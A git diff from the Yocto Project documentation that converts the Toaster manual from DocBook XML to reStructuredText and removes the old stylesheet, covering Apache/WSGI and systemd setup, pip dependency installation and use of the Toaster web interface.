-   &lt;Directory /var/www/toaster/static_files&gt;
-           &lt;IfModule mod_access_compat.c&gt;
-                   Order allow,deny
-                   Allow from all
-           &lt;/IfModule&gt;
-           &lt;IfModule !mod_access_compat.c&gt;
-                   Require all granted
-           &lt;/IfModule&gt;
-   &lt;/Directory&gt;
-
-   &lt;Directory /var/www/toaster/poky/bitbake/lib/toaster/toastermain&gt;
-           &lt;Files "wsgi.py"&gt;
-              Require all granted
-           &lt;/Files&gt;
-   &lt;/Directory&gt;
-
-   WSGIDaemonProcess toaster_wsgi python-path=/var/www/toaster/poky/bitbake/lib/toaster:/var/www/toaster/.local/lib/python3.4/site-packages
-
-   WSGIScriptAlias / "/var/www/toaster/poky/bitbake/lib/toaster/toastermain/wsgi.py"
-   &lt;Location /&gt;
-       WSGIProcessGroup toaster_wsgi
-   &lt;/Location&gt;
-                      </literallayout>
-                      If you are using Ubuntu or Debian,
-                      you will need to enable the config and module for Apache:
-                      <literallayout class='monospaced'>
-   $ sudo a2enmod wsgi
-   $ sudo a2enconf toaster
-   $ chmod +x bitbake/lib/toaster/toastermain/wsgi.py
-                      </literallayout>
-                      Finally, restart Apache to make sure all new configuration
-                      is loaded.
-                      For Ubuntu, Debian, and OpenSUSE use:
-                      <literallayout class='monospaced'>
-   $ sudo service apache2 restart
-                      </literallayout>
-                      For Fedora and RedHat use:
-                      <literallayout class='monospaced'>
-   $ sudo service httpd restart
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      Prepare the systemd service to run Toaster builds.
-                      Here is a sample configuration file for the service:
-                      <literallayout class='monospaced'>
-   [Unit]
-   Description=Toaster runbuilds
-
-   [Service]
-   Type=forking
-   User=toaster
-   ExecStart=/usr/bin/screen -d -m -S runbuilds /var/www/toaster/poky/bitbake/lib/toaster/runbuilds-service.sh start
-   ExecStop=/usr/bin/screen -S runbuilds -X quit
-   WorkingDirectory=/var/www/toaster/poky
-
-   [Install]
-   WantedBy=multi-user.target
-                      </literallayout>
-                      Prepare the <filename>runbuilds-service.sh</filename>
-                      script that you need to place in the
-                      <filename>/var/www/toaster/poky/bitbake/lib/toaster/</filename>
-                      directory by setting up executable permissions:
-                      <literallayout class='monospaced'>
-   #!/bin/bash
-
-   #export http_proxy=http://proxy.host.com:8080
-   #export https_proxy=http://proxy.host.com:8080
-   #export GIT_PROXY_COMMAND=$HOME/bin/gitproxy
-
-   cd ~/poky/
-   source ./oe-init-build-env build
-   source ../bitbake/bin/toaster $1 noweb
-   [ "$1" == 'start' ] &amp;&amp; /bin/bash
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      Run the service:
-                      <literallayout class='monospaced'>
-   # service runbuilds start
-                      </literallayout>
-                      Since the service is running in a detached screen
-                      session, you can attach to it using this command:
-                      <literallayout class='monospaced'>
-   $ sudo su - toaster
-   $ screen -rS runbuilds
-                      </literallayout>
-                      You can detach from the service again using "Ctrl-a"
-                      followed by "d" key combination.
-                      </para></listitem>
-              </orderedlist>
-              You can now open up a browser and start using Toaster.
-          </para>
-      </section>
-  </section>
-
-  <section id='using-the-toaster-web-interface'>
-      <title>Using the Toaster Web Interface</title>
-
-      <para>
-          The Toaster web interface allows you to do the following:
-          <itemizedlist>
-              <listitem><para>
-                  Browse published layers in the
-                  <ulink url='http://layers.openembedded.org'>OpenEmbedded Layer Index</ulink>
-                  that are available for your selected version of the build
-                  system.
-                  </para></listitem>
-              <listitem><para>
-                  Import your own layers for building.
-                  </para></listitem>
-              <listitem><para>
-                  Add and remove layers from your configuration.
-                  </para></listitem>
-              <listitem><para>
-                  Set configuration variables.
-                  </para></listitem>
-              <listitem><para>
-                  Select a target or multiple targets to build.
-                  </para></listitem>
-              <listitem><para>
-                  Start your builds.
-                  </para></listitem>
-              <listitem><para>
-                  See what was built (recipes and packages) and what
-                  packages were installed into your final image.
-                  </para></listitem>
-              <listitem><para>
-                  Browse the directory structure of your image.
-                  </para></listitem>
-              <listitem><para>
-                  See the value of all variables in your build configuration,
-                  and which files set each value.
-                  </para></listitem>
-              <listitem><para>
-                  Examine error, warning and trace messages to aid in
-                  debugging.
-                  </para></listitem>
-              <listitem><para>
-                  See information about the BitBake tasks executed and
-                  reused during your build, including those that used
-                  shared state.
-                  </para></listitem>
-              <listitem><para>
-                  See dependency relationships between recipes, packages
-                  and tasks.
-                  </para></listitem>
-              <listitem><para>
-                  See performance information such as build time, task time,
-                  CPU usage, and disk I/O.
-                  </para></listitem>
-          </itemizedlist>
-      </para>
-
-      <section id='web-interface-videos'>
-          <title>Toaster Web Interface Videos</title>
-
-          <para>
-              Following are several videos that show how to use the Toaster GUI:
-              <itemizedlist>
-                  <listitem><para><emphasis>Build Configuration:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=qYgDZ8YzV6w'>video</ulink>
-                      overviews and demonstrates build configuration for Toaster.
-                      </para></listitem>
-                  <listitem><para><emphasis>Build Custom Layers:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=QJzaE_XjX5c'>video</ulink>
-                      shows you how to build custom layers that are used with
-                      Toaster.
-                      </para></listitem>
-                  <listitem><para><emphasis>Toaster Homepage and Table Controls:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=QEARDnrR1Xw'>video</ulink>
-                      goes over the Toaster entry page, and provides
-                      an overview of the data manipulation capabilities of
-                      Toaster, which include search, sorting and filtering by
-                      different criteria.
-                      </para></listitem>
-                  <listitem><para><emphasis>Build Dashboard:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=KKqHYcnp2gE'>video</ulink>
-                      shows you the build dashboard, a page providing an
-                      overview of the information available for a selected build.
-                      </para></listitem>
-                  <listitem><para><emphasis>Image Information:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=XqYGFsmA0Rw'>video</ulink>
-                      walks through the information Toaster provides
-                      about images: packages installed and root file system.
-                      </para></listitem>
-                  <listitem><para><emphasis>Configuration:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=UW-j-T2TzIg'>video</ulink>
-                      provides Toaster build configuration information.
-                      </para></listitem>
-                  <listitem><para><emphasis>Tasks:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=D4-9vGSxQtw'>video</ulink>
-                      shows the information Toaster provides about the
-                      tasks run by the build system.
-                      </para></listitem>
-                  <listitem><para><emphasis>Recipes and Packages Built:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=x-6dx4huNnw'>video</ulink>
-                      shows the information Toaster provides about recipes
-                      and packages built.
-                      </para></listitem>
-                  <listitem><para><emphasis>Performance Data:</emphasis>
-                      This
-                      <ulink url='https://www.youtube.com/watch?v=qWGMrJoqusQ'>video</ulink>
-                      shows the build performance data provided by
-                      Toaster.
-                      </para></listitem>
-              </itemizedlist>
-          </para>
-      </section>
-
-      <section id='a-note-on-the-local-yocto-project-release'>
-          <title>Additional Information About the Local Yocto Project Release</title>
-
-          <para>
-              This section only applies if you have set up Toaster
-              for local development, as explained in the
-              "<link linkend='starting-toaster-for-local-development'>Starting Toaster for Local Development</link>"
-              section.
-          </para>
-
-          <para>
-              When you create a project in Toaster, you will be asked to
-              provide a name and to select a Yocto Project release.
-              One of the release options you will find is called
-              "Local Yocto Project".
-              <imagedata fileref="figures/new-project.png" align="center" width="9in" />
-          </para>
-
-          <para>
-              When you select the "Local Yocto Project" release, Toaster
-              will run your builds using the local Yocto
-              Project clone you have in your computer: the same clone
-              you are using to run Toaster.
-              Unless you manually update
-              this clone, your builds will always use the same Git revision.
-          </para>
-
-          <para>
-              If you select any of the other release options, Toaster
-              will fetch the tip of your selected release from the upstream
-              <ulink url='https://git.yoctoproject.org'>Yocto Project repository</ulink>
-              every time you run a build.
-              Fetching this tip effectively
-              means that if your selected release is updated upstream, the
-              Git revision you are using for your builds will change.
-              If you are doing development locally, you might not want this
-              change to happen.
-              In that case, the "Local Yocto Project"
-              release might be the right choice.
-          </para>
-
-          <para>
-              However, the "Local Yocto Project" release
-              will not provide you with any compatible layers, other than the
-              three core layers that come with the Yocto Project:
-              <itemizedlist>
-                  <listitem><para>
-                      <ulink url='http://layers.openembedded.org/layerindex/branch/master/layer/openembedded-core/'>openembedded-core</ulink>
-                  </para></listitem>
-                  <listitem><para>
-                      <ulink url='http://layers.openembedded.org/layerindex/branch/master/layer/meta-poky/'>meta-poky</ulink>
-                  </para></listitem>
-                  <listitem><para>
-                      <ulink url='http://layers.openembedded.org/layerindex/branch/master/layer/meta-yocto-bsp/'>meta-yocto-bsp</ulink>
-                  </para></listitem>
-              </itemizedlist>
-              <imagedata fileref="figures/compatible-layers.png" align="center" width="9in" />
-          </para>
-
-          <para>
-              If you want to build any other layers, you will need to
-              manually import them into your Toaster project, using the
-              "Import layer" page.
-              <imagedata fileref="figures/import-layer.png" align="center" width="9in" />
-          </para>
-
-      </section>
-
-      <section id='toaster-web-interface-preferred-version'>
-          <title>Building a Specific Recipe Given Multiple Versions</title>
-
-            <para>
-                Occasionally, a layer might provide more than one version of
-                the same recipe.
-                For example, the <filename>openembedded-core</filename> layer
-                provides two versions of the <filename>bash</filename> recipe
-                (i.e. 3.2.48 and 4.3.30-r0) and two versions of the
-                <filename>which</filename> recipe (i.e. 2.21 and 2.18).
-                The following figure shows this exact scenario:
-                <imagedata fileref="figures/bash-oecore.png" align="center" width="9in" depth="6in" />
-            </para>
-
-            <para>
-                By default, the OpenEmbedded build system builds one of the
-                two recipes.
-                For the <filename>bash</filename> case, version 4.3.30-r0 is
-                built by default.
-                Unfortunately, Toaster as it exists, is not able to override
-                the default recipe version.
-                If you would like to build bash 3.2.48, you need to set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></ulink>
-                variable.
-                You can do so from Toaster, using the "Add variable" form,
-                which is available in the "BitBake variables" page of the
-                project configuration section as shown in the following screen:
-                <imagedata fileref="figures/add-variable.png" align="center" width="9in" depth="6in" />
-            </para>
-
-            <para>
-                To specify <filename>bash</filename> 3.2.48 as the version to build,
-                enter "PREFERRED_VERSION_bash" in the "Variable" field, and "3.2.48"
-                in the "Value" field.
-                Next, click the "Add variable" button:
-                <imagedata fileref="figures/set-variable.png" align="center" width="9in" depth="6in" />
-            </para>
-
-            <para>
-                After clicking the "Add variable" button, the settings for
-                <filename>PREFERRED_VERSION</filename> are added to the bottom
-                of the BitBake variables list.
-                With these settings, the OpenEmbedded build system builds the
-                desired version of the recipe rather than the default version:
-                <imagedata fileref="figures/variable-added.png" align="center" width="9in" depth="6in" />
-            </para>
-        </section>
-    </section>
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-start.rst b/documentation/toaster-manual/toaster-manual-start.rst
new file mode 100644
index 0000000000..267f9f4cdc
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-start.rst
@@ -0,0 +1,57 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+.. Set default pygments highlighting to shell for this document
+.. highlight:: shell
+
+************************
+Preparing to Use Toaster
+************************
+
+This chapter describes how you need to prepare your system in order to
+use Toaster.
+
+.. _toaster-setting-up-the-basic-system-requirements:
+
+Setting Up the Basic System Requirements
+========================================
+
+Before you can use Toaster, you need to first set up your build system
+to run the Yocto Project. To do this, follow the instructions in the
+":ref:`dev-manual/dev-manual-start:preparing the build host`" section of
+the Yocto Project Development Tasks Manual. For Ubuntu/Debian, you might
+also need to do an additional install of pip3. ::
+
+   $ sudo apt-get install python3-pip
+
+.. _toaster-establishing-toaster-system-dependencies:
+
+Establishing Toaster System Dependencies
+========================================
+
+Toaster requires extra Python dependencies in order to run. A Toaster
+requirements file named ``toaster-requirements.txt`` defines the Python
+dependencies. The requirements file is located in the ``bitbake``
+directory, which is located in the root directory of the
+:term:`Source Directory` (e.g.
+``poky/bitbake/toaster-requirements.txt``). The dependencies appear in a
+``pip``, install-compatible format.
+
+.. _toaster-load-packages:
+
+Install Toaster Packages
+------------------------
+
+You need to install the packages that Toaster requires. Use this
+command::
+
+   $ pip3 install --user -r bitbake/toaster-requirements.txt
+
+The previous command installs the necessary Toaster modules into a local
+python 3 cache in your ``$HOME`` directory. The caches is actually
+located in ``$HOME/.local``. To see what packages have been installed
+into your ``$HOME`` directory, do the following::
+
+   $ pip3 list installed --local
+
+If you need to remove something, the following works::
+
+   $ pip3 uninstall PackageNameToUninstall
diff --git a/documentation/toaster-manual/toaster-manual-start.xml b/documentation/toaster-manual/toaster-manual-start.xml
deleted file mode 100644
index fc187ecd5e..0000000000
--- a/documentation/toaster-manual/toaster-manual-start.xml
+++ /dev/null
@@ -1,115 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-start'>
-
-<title>Preparing to Use Toaster</title>
-
-    <para>
-        This chapter describes how you need to prepare your system in order to
-        use Toaster.
-    </para>
-
-    <section id='toaster-setting-up-the-basic-system-requirements'>
-        <title>Setting Up the Basic System Requirements</title>
-
-        <para>
-            Before you can use Toaster, you need to first set up your
-            build system to run the Yocto Project.
-            To do this, follow the instructions in the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
-            section of the Yocto Project Development Tasks
-            Manual.
- 	    For Ubuntu/Debian, you might also need to do an additional install
-            of pip3.
-                <literallayout class='monospaced'>
-     $ sudo apt-get install python3-pip
-                </literallayout>
-        </para>
-    </section>
-
-    <section id='toaster-establishing-toaster-system-dependencies'>
-        <title>Establishing Toaster System Dependencies</title>
-
-        <para>
-            Toaster requires extra Python dependencies in order to run.
-            A Toaster requirements file named
-            <filename>toaster-requirements.txt</filename> defines the
-            Python dependencies.
-            The requirements file is located in the
-            <filename>bitbake</filename> directory, which is located in the
-            root directory of the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            (e.g. <filename>poky/bitbake/toaster-requirements.txt</filename>).
-            The dependencies appear in a <filename>pip</filename>,
-            install-compatible format.
-        </para>
-
-        <section id='toaster-load-packages'>
-            <title>Install Toaster Packages</title>
-
-            <para>
-                You need to install the packages that Toaster requires.
-                Use this command:
-                <literallayout class='monospaced'>
-     $ pip3 install --user -r bitbake/toaster-requirements.txt
-                </literallayout>
-                The previous command installs the necessary Toaster modules
-                into a local python 3 cache in your
-                <filename>$HOME</filename> directory.
-                The caches is actually located in
-                <filename>$HOME/.local</filename>.
-                To see what packages have been installed into your
-                <filename>$HOME</filename> directory, do the following:
-                <literallayout class='monospaced'>
-     $ pip3 list installed --local
-                </literallayout>
-                If you need to remove something, the following works:
-                <literallayout class='monospaced'>
-     $ pip3 uninstall PackageNameToUninstall
-                </literallayout>
-            </para>
-        </section>
-
-<!-- Commenting this section out for now in case it needs to be used again.
-
-        <section id='toaster-install-daemon'>
-            <title>Install <filename>daemon</filename></title>
-
-            <para>
-                Toaster depends on
-                <ulink url='http://www.libslack.org/daemon/'><filename>daemon</filename></ulink>.
-                Depending on your distribution, how you install
-                <filename>daemon</filename> differs:
-                <itemizedlist>
-                    <listitem><para><emphasis>Debian-Based Systems:</emphasis>
-                        If you are running a Debian-based distribution,
-                        install <filename>daemon</filename> using the
-                        following command:
-                        <literallayout class='monospaced'>
-     $ sudo apt-get install daemon​
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para><emphasis>Non-Debian-Based Systems:</emphasis>
-                        If you are not running a Debian-based distribution
-                        (Redhat-based distribution such as Fedora),
-                        you need to download ​the file relevant to the
-                        architecture and then install
-                        <filename>daemon</filename> manually.
-                        Following are the commands for 64-bit distributions:
-                        <literallayout class='monospaced'>
-     $ wget http://libslack.org/daemon/download/daemon-0.6.4-1.x86_64.rpm
-     $ sudo rpm -i daemon-0.6.4-1.x86_64.rpm
-                        </literallayout>
-                        Here are the commands for a 32-bit distribution:
-                        <literallayout class='monospaced'>
-     $ wget http://libslack.org/daemon/download/daemon-0.6.4-1.i686.rpm
-     $ sudo rpm -i ​daemon-0.6.4-1.i686.rpm​
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section> -->
-    </section>
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-style.css b/documentation/toaster-manual/toaster-manual-style.css
deleted file mode 100644
index 6d6b9fb65d..0000000000
--- a/documentation/toaster-manual/toaster-manual-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/toaster-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
